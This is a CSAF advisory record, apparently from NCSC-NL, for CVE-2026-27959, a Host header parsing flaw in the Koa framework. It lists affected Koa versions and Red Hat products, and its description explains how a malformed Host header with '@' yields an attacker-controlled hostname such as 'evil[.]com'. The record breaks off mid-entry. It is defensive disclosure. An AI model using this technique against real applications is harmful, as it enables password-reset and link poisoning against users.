{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or timeliness. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to their cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability to use the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy or incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of forum also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-27959",
        "tracking": {
            "current_release_date": "2026-03-23T10:29:52.228714Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-27959",
            "initial_release_date": "2026-02-26T02:25:19.858966Z",
            "revision_history": [
                {
                    "date": "2026-02-26T02:25:19.858966Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)."
                },
                {
                    "date": "2026-02-26T02:25:24.737945Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-02-26T02:39:01.966887Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (2).| References created (3).| CWES updated (1)."
                },
                {
                    "date": "2026-02-26T02:39:04.766887Z",
                    "number": "4",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-02-26T07:34:58.573466Z",
                    "number": "5",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-02-26T14:13:20.740916Z",
                    "number": "6",
                    "summary": "Source created.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-02-26T14:13:23.012737Z",
                    "number": "7",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-02-26T21:01:44.928057Z",
                    "number": "8",
                    "summary": "Unknown change."
                },
                {
                    "date": "2026-02-26T23:39:50.375125Z",
                    "number": "9",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (5).| CWES updated (1)."
                },
                {
                    "date": "2026-02-26T23:39:53.374811Z",
                    "number": "10",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-02-27T00:20:49.465504Z",
                    "number": "11",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| Products created (1).| References created (4).| CWES updated (1)."
                },
                {
                    "date": "2026-02-28T00:27:33.384833Z",
                    "number": "12",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (12).| Product Identifiers created (5).| Product Remediations created (12).| References created (5).| CWES updated (1).| Vendor_assessment created."
                },
                {
                    "date": "2026-02-28T01:25:55.676373Z",
                    "number": "13",
                    "summary": "Products created (1).| Product Identifiers created (2).| Products connected (1).| Exploits created (1)."
                },
                {
                    "date": "2026-02-28T01:25:58.755283Z",
                    "number": "14",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-02-28T08:19:56.809938Z",
                    "number": "15",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (88).| Products created (5).| References created (5).| CWES updated (1)."
                },
                {
                    "date": "2026-02-28T08:20:06.502422Z",
                    "number": "16",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-02T17:01:34.594313Z",
                    "number": "17",
                    "summary": "Products removed (87)."
                },
                {
                    "date": "2026-03-02T17:01:40.175823Z",
                    "number": "18",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-03T14:51:07.815040Z",
                    "number": "19",
                    "summary": "Products connected (87)."
                },
                {
                    "date": "2026-03-03T14:51:15.360773Z",
                    "number": "20",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-20T09:39:19.101870Z",
                    "number": "21",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                }
            ],
            "status": "interim",
            "version": "21"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/1",
                                "product": {
                                    "name": "vers:rpm/1",
                                    "product_id": "CSAFPID-1508265",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:rhdh:1"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Developer Hub"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/unknown",
                                "product": {
                                    "name": "vers:rpm/unknown",
                                    "product_id": "CSAFPID-1439279",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:openshift_ai"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat OpenShift AI (RHOAI)"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/4",
                                "product": {
                                    "name": "vers:rpm/4",
                                    "product_id": "CSAFPID-1439328",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:openshift:4"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat OpenShift Container Platform 4"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/3",
                                "product": {
                                    "name": "vers:rpm/3",
                                    "product_id": "CSAFPID-1441150",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:openshift_devspaces:3"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat OpenShift Dev Spaces"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/2",
                                "product": {
                                    "name": "vers:rpm/2",
                                    "product_id": "CSAFPID-5486263",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:ansible_portal:2"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Self-service automation portal 2"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5486265"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "automation-portal"
                            }
                        ],
                        "category": "product_family",
                        "name": "Self-service automation portal 2"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2467450"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "code-rhel9"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat OpenShift Dev Spaces"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2933419"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-dashboard-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5222758"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-mod-arch-gen-ai-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5157328"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-mod-arch-model-registry-rhel9"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat OpenShift AI (RHOAI)"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2159493"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "ose-monitoring-plugin-rhel9"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat OpenShift Container Platform 4"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-1508266"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "rhdh-hub-rhel9"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Developer Hub"
                    }
                ],
                "category": "vendor",
                "name": "Red Hat"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.0.2",
                                "product": {
                                    "name": "vers:unknown/0.0.2",
                                    "product_id": "CSAFPID-3780409"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.1.0",
                                "product": {
                                    "name": "vers:unknown/0.1.0",
                                    "product_id": "CSAFPID-3780410"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.1.1",
                                "product": {
                                    "name": "vers:unknown/0.1.1",
                                    "product_id": "CSAFPID-3780411"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.1.2",
                                "product": {
                                    "name": "vers:unknown/0.1.2",
                                    "product_id": "CSAFPID-3780412"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.0",
                                "product": {
                                    "name": "vers:unknown/0.10.0",
                                    "product_id": "CSAFPID-3780413"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.11.0",
                                "product": {
                                    "name": "vers:unknown/0.11.0",
                                    "product_id": "CSAFPID-3780414"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.12.0",
                                "product": {
                                    "name": "vers:unknown/0.12.0",
                                    "product_id": "CSAFPID-3780415"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.12.1",
                                "product": {
                                    "name": "vers:unknown/0.12.1",
                                    "product_id": "CSAFPID-3780416"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.12.2",
                                "product": {
                                    "name": "vers:unknown/0.12.2",
                                    "product_id": "CSAFPID-3780417"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.13.0",
                                "product": {
                                    "name": "vers:unknown/0.13.0",
                                    "product_id": "CSAFPID-3780418"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.14.0",
                                "product": {
                                    "name": "vers:unknown/0.14.0",
                                    "product_id": "CSAFPID-3780419"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.15.0",
                                "product": {
                                    "name": "vers:unknown/0.15.0",
                                    "product_id": "CSAFPID-3780420"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.16.0",
                                "product": {
                                    "name": "vers:unknown/0.16.0",
                                    "product_id": "CSAFPID-3780421"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.17.0",
                                "product": {
                                    "name": "vers:unknown/0.17.0",
                                    "product_id": "CSAFPID-3780422"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.18.0",
                                "product": {
                                    "name": "vers:unknown/0.18.0",
                                    "product_id": "CSAFPID-3780423"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.18.1",
                                "product": {
                                    "name": "vers:unknown/0.18.1",
                                    "product_id": "CSAFPID-3780424"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.19.0",
                                "product": {
                                    "name": "vers:unknown/0.19.0",
                                    "product_id": "CSAFPID-3780425"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.19.1",
                                "product": {
                                    "name": "vers:unknown/0.19.1",
                                    "product_id": "CSAFPID-3780426"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.2.0",
                                "product": {
                                    "name": "vers:unknown/0.2.0",
                                    "product_id": "CSAFPID-3780427"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.2.1",
                                "product": {
                                    "name": "vers:unknown/0.2.1",
                                    "product_id": "CSAFPID-3780428"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.20.0",
                                "product": {
                                    "name": "vers:unknown/0.20.0",
                                    "product_id": "CSAFPID-3780429"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.21.0",
                                "product": {
                                    "name": "vers:unknown/0.21.0",
                                    "product_id": "CSAFPID-2205447"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.3.0",
                                "product": {
                                    "name": "vers:unknown/0.3.0",
                                    "product_id": "CSAFPID-3780430"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.4.0",
                                "product": {
                                    "name": "vers:unknown/0.4.0",
                                    "product_id": "CSAFPID-3780431"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.5.0",
                                "product": {
                                    "name": "vers:unknown/0.5.0",
                                    "product_id": "CSAFPID-3780432"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.5.1",
                                "product": {
                                    "name": "vers:unknown/0.5.1",
                                    "product_id": "CSAFPID-3780433"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.5.2",
                                "product": {
                                    "name": "vers:unknown/0.5.2",
                                    "product_id": "CSAFPID-3780434"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.5.3",
                                "product": {
                                    "name": "vers:unknown/0.5.3",
                                    "product_id": "CSAFPID-3780435"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.5.4",
                                "product": {
                                    "name": "vers:unknown/0.5.4",
                                    "product_id": "CSAFPID-3780436"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.5.5",
                                "product": {
                                    "name": "vers:unknown/0.5.5",
                                    "product_id": "CSAFPID-3780437"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.6.0",
                                "product": {
                                    "name": "vers:unknown/0.6.0",
                                    "product_id": "CSAFPID-3780438"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.6.1",
                                "product": {
                                    "name": "vers:unknown/0.6.1",
                                    "product_id": "CSAFPID-3780439"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.6.2",
                                "product": {
                                    "name": "vers:unknown/0.6.2",
                                    "product_id": "CSAFPID-3780440"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.6.3",
                                "product": {
                                    "name": "vers:unknown/0.6.3",
                                    "product_id": "CSAFPID-3780441"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.7.0",
                                "product": {
                                    "name": "vers:unknown/0.7.0",
                                    "product_id": "CSAFPID-3780442"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.8.0",
                                "product": {
                                    "name": "vers:unknown/0.8.0",
                                    "product_id": "CSAFPID-3780443"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.8.1",
                                "product": {
                                    "name": "vers:unknown/0.8.1",
                                    "product_id": "CSAFPID-3780444"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.8.2",
                                "product": {
                                    "name": "vers:unknown/0.8.2",
                                    "product_id": "CSAFPID-3780445"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.9.0",
                                "product": {
                                    "name": "vers:unknown/0.9.0",
                                    "product_id": "CSAFPID-3780446"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.0.0",
                                "product": {
                                    "name": "vers:unknown/1.0.0",
                                    "product_id": "CSAFPID-3780447"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.1.0",
                                "product": {
                                    "name": "vers:unknown/1.1.0",
                                    "product_id": "CSAFPID-3780448"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.0-alpha.1",
                                "product": {
                                    "name": "vers:unknown/2.0.0-alpha.1",
                                    "product_id": "CSAFPID-3780449"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.0-alpha.2",
                                "product": {
                                    "name": "vers:unknown/2.0.0-alpha.2",
                                    "product_id": "CSAFPID-3780450"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.0-alpha.3",
                                "product": {
                                    "name": "vers:unknown/2.0.0-alpha.3",
                                    "product_id": "CSAFPID-3780451"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.0-alpha.4",
                                "product": {
                                    "name": "vers:unknown/2.0.0-alpha.4",
                                    "product_id": "CSAFPID-3780452"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.0-alpha.5",
                                "product": {
                                    "name": "vers:unknown/2.0.0-alpha.5",
                                    "product_id": "CSAFPID-3780453"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.0-alpha.6",
                                "product": {
                                    "name": "vers:unknown/2.0.0-alpha.6",
                                    "product_id": "CSAFPID-3780454"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.0-alpha.7",
                                "product": {
                                    "name": "vers:unknown/2.0.0-alpha.7",
                                    "product_id": "CSAFPID-3780455"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.0-alpha.8",
                                "product": {
                                    "name": "vers:unknown/2.0.0-alpha.8",
                                    "product_id": "CSAFPID-3780456"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.1",
                                "product": {
                                    "name": "vers:unknown/2.0.1",
                                    "product_id": "CSAFPID-3780457"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.1.0",
                                "product": {
                                    "name": "vers:unknown/2.1.0",
                                    "product_id": "CSAFPID-3780458"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.10.0",
                                "product": {
                                    "name": "vers:unknown/2.10.0",
                                    "product_id": "CSAFPID-3780459"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.11.0",
                                "product": {
                                    "name": "vers:unknown/2.11.0",
                                    "product_id": "CSAFPID-3780460"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.12.0",
                                "product": {
                                    "name": "vers:unknown/2.12.0",
                                    "product_id": "CSAFPID-3780461"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.12.1",
                                "product": {
                                    "name": "vers:unknown/2.12.1",
                                    "product_id": "CSAFPID-3780462"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.13.0",
                                "product": {
                                    "name": "vers:unknown/2.13.0",
                                    "product_id": "CSAFPID-3780463"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.13.1",
                                "product": {
                                    "name": "vers:unknown/2.13.1",
                                    "product_id": "CSAFPID-3780464"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.13.2",
                                "product": {
                                    "name": "vers:unknown/2.13.2",
                                    "product_id": "CSAFPID-3797112"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.13.3",
                                "product": {
                                    "name": "vers:unknown/2.13.3",
                                    "product_id": "CSAFPID-3797113"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.13.4",
                                "product": {
                                    "name": "vers:unknown/2.13.4",
                                    "product_id": "CSAFPID-3797114"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.14.0",
                                "product": {
                                    "name": "vers:unknown/2.14.0",
                                    "product_id": "CSAFPID-3797115"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.14.1",
                                "product": {
                                    "name": "vers:unknown/2.14.1",
                                    "product_id": "CSAFPID-3797116"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.14.2",
                                "product": {
                                    "name": "vers:unknown/2.14.2",
                                    "product_id": "CSAFPID-3797117"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.15.0",
                                "product": {
                                    "name": "vers:unknown/2.15.0",
                                    "product_id": "CSAFPID-2205448"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.15.1",
                                "product": {
                                    "name": "vers:unknown/2.15.1",
                                    "product_id": "CSAFPID-2205443"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.15.2",
                                "product": {
                                    "name": "vers:unknown/2.15.2",
                                    "product_id": "CSAFPID-2205442"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.15.3",
                                "product": {
                                    "name": "vers:unknown/2.15.3",
                                    "product_id": "CSAFPID-2205440"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.15.4",
                                "product": {
                                    "name": "vers:unknown/2.15.4",
                                    "product_id": "CSAFPID-5140726"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.3.0",
                                "product": {
                                    "name": "vers:unknown/2.3.0",
                                    "product_id": "CSAFPID-3780466"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.4.0",
                                "product": {
                                    "name": "vers:unknown/2.4.0",
                                    "product_id": "CSAFPID-3780467"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.4.1",
                                "product": {
                                    "name": "vers:unknown/2.4.1",
                                    "product_id": "CSAFPID-3780468"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.5.0",
                                "product": {
                                    "name": "vers:unknown/2.5.0",
                                    "product_id": "CSAFPID-3780469"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.5.1",
                                "product": {
                                    "name": "vers:unknown/2.5.1",
                                    "product_id": "CSAFPID-3780470"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.5.2",
                                "product": {
                                    "name": "vers:unknown/2.5.2",
                                    "product_id": "CSAFPID-3780471"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.5.3",
                                "product": {
                                    "name": "vers:unknown/2.5.3",
                                    "product_id": "CSAFPID-3780472"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.6.0",
                                "product": {
                                    "name": "vers:unknown/2.6.0",
                                    "product_id": "CSAFPID-3780473"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.6.1",
                                "product": {
                                    "name": "vers:unknown/2.6.1",
                                    "product_id": "CSAFPID-3780474"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.6.2",
                                "product": {
                                    "name": "vers:unknown/2.6.2",
                                    "product_id": "CSAFPID-3780475"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.7.0",
                                "product": {
                                    "name": "vers:unknown/2.7.0",
                                    "product_id": "CSAFPID-3780476"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.8.0",
                                "product": {
                                    "name": "vers:unknown/2.8.0",
                                    "product_id": "CSAFPID-3780477"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.8.1",
                                "product": {
                                    "name": "vers:unknown/2.8.1",
                                    "product_id": "CSAFPID-3780478"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.8.2",
                                "product": {
                                    "name": "vers:unknown/2.8.2",
                                    "product_id": "CSAFPID-3780479"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.9.0",
                                "product": {
                                    "name": "vers:unknown/2.9.0",
                                    "product_id": "CSAFPID-3780480"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<2.16.14",
                                "product": {
                                    "name": "vers:unknown/<2.16.14",
                                    "product_id": "CSAFPID-5736894",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:koajs:koa:*:*:*:*:*:node.js:*:*"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<2.16.4",
                                "product": {
                                    "name": "vers:unknown/<2.16.4",
                                    "product_id": "CSAFPID-5723467"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=0|<2.16.4",
                                "product": {
                                    "name": "vers:unknown/>=0|<2.16.4",
                                    "product_id": "CSAFPID-5733339"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=3.0.0|<3.1.2",
                                "product": {
                                    "name": "vers:unknown/>=3.0.0|<3.1.2",
                                    "product_id": "CSAFPID-5723466",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:koajs:koa:*:*:*:*:*:node.js:*:*"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.16.0",
                                "product": {
                                    "name": "vers:unknown/v2.16.0",
                                    "product_id": "CSAFPID-5140727"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.16.1",
                                "product": {
                                    "name": "vers:unknown/v2.16.1",
                                    "product_id": "CSAFPID-5748305"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.16.2",
                                "product": {
                                    "name": "vers:unknown/v2.16.2",
                                    "product_id": "CSAFPID-5129396"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.16.3",
                                "product": {
                                    "name": "vers:unknown/v2.16.3",
                                    "product_id": "CSAFPID-5748306"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.0.0",
                                "product": {
                                    "name": "vers:unknown/v3.0.0",
                                    "product_id": "CSAFPID-5138906"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.0.1",
                                "product": {
                                    "name": "vers:unknown/v3.0.1",
                                    "product_id": "CSAFPID-5129397"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.0.2",
                                "product": {
                                    "name": "vers:unknown/v3.0.2",
                                    "product_id": "CSAFPID-5129398"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.0.3",
                                "product": {
                                    "name": "vers:unknown/v3.0.3",
                                    "product_id": "CSAFPID-5748307"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.1.0",
                                "product": {
                                    "name": "vers:unknown/v3.1.0",
                                    "product_id": "CSAFPID-5748308"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.1.1",
                                "product": {
                                    "name": "vers:unknown/v3.1.1",
                                    "product_id": "CSAFPID-5748309"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "koa"
                    }
                ],
                "category": "vendor",
                "name": "koajs"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-27959",
            "notes": [
                {
                    "category": "description",
                    "text": "Koa is middleware for Node.js using ES2017 async functions. Prior to versions 3.1.2 and 2.16.4, Koa's `ctx.hostname` API performs naive parsing of the HTTP Host header, extracting everything before the first colon without validating the input conforms to RFC 3986 hostname syntax. When a malformed Host header containing a `@` symbol is received, `ctx.hostname` returns `evil[.]com` - an attacker-controlled value. Applications using `ctx.hostname` for URL generation, password reset links, email verification URLs, or routing decisions are vulnerable to Host header injection attacks. Versions 3.1.2 and 2.16.4 fix the issue.",
                    "title": "nvd - https://nvd.nist.gov/vuln/detail/CVE-2026-27959"
                },
                {
                    "category": "description",
                    "text": "Koa is middleware for Node.js using ES2017 async functions. Prior to versions 3.1.2 and 2.16.4, Koa's `ctx.hostname` API performs naive parsing of the HTTP Host header, extracting everything before the first colon without validating the input conforms to RFC 3986 hostname syntax. When a malformed Host header containing a `@` symbol is received, `ctx.hostname` returns `evil[.]com` - an attacker-controlled value. Applications using `ctx.hostname` for URL generation, password reset links, email verification URLs, or routing decisions are vulnerable to Host header injection attacks. Versions 3.1.2 and 2.16.4 fix the issue.",
                    "title": "cveprojectv5 - https://www.cve.org/CVERecord?id=CVE-2026-27959"
                },
                {
                    "category": "description",
